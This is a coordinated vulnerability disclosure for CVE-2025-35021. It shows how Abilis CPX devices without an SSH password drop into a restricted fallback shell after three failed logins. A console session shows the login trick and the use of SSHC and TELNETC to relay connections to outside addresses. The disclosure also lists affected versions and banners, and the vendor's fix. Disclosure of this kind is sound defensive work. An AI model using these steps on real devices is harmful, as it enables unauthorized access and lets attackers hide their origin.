CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay#

AHA! has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero’s standard disclosure policy today, November 3, 2025. CVE-2025-35021 has been assigned to this issue. Any questions about this disclosure should be directed to [email protected].

The GCVE identifier for this issue is GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100

Executive Summary#

By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of CWE-1188, ‘Initialization of a Resource with an Insecure Default,’ and is estimated to have a CVSS 3.1 score of 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant SSVC vectors for this vulnerability are Exploitation: PoC and Technical Impact: Partial.

Technical Details#

A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.

In the example console session below, three known-incorrect logins (bad) are offered to an affected device before being dropped to the SSHS prompt.

$ ssh root@[TARGET]
root@TARGET's password:

COM

Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED

Login: bad

PERMISSION DENIED


CLR F0 AE

[192.168.11.002] SSHS>

At this point, we are in the SSHS shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the SSHC shell:

[192.168.11.002]help
CP             Open connection to local CP resource
SSH            Open connection to local SSH client
TELNET         Open connection to local TELNET client
<CD>-<UD>      Open X25 call with CD and UD
CLR            Close connection
CLOSE          Close SSH Session
EXIT           Close SSH Session
HELP           Show current help
[192.168.11.002] SSHS>SSH
[192.168.11.002] SSHC>
[192.168.11.002] SSHC>OPEN 8.8.8.8:53
Trying 8.8.8.8:53 ... Open

Version identification fault

Similar to the SSHC shell, the TELNETC shell offers another path to connection relaying, and does not require the service to handshake a particular way:

[192.168.11.002] SSHS>TELNET
[192.168.11.002] TELNETC>
[192.168.11.002]TELNETC>open 1.2.3.4:5678
Trying 1.2.3.4:5678 ... Open

Affected Products#

Affected versions of CPX devices include:

  • Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
  • Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
  • Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
  • Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
  • Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
  • Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
  • Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
  • Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
  • Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0

Across these devices, affected SSH banners include:

  • SSH-1.99-CPX SSH Server
  • SSH-2.0-CPX SSH Server

Mitigation#

According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.

Attacker Value#

By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.

Credit#

This issue was discovered by HD Moore and disclosure was coordinated by Tod Beardsley through the AHA! CNA.

Timeline#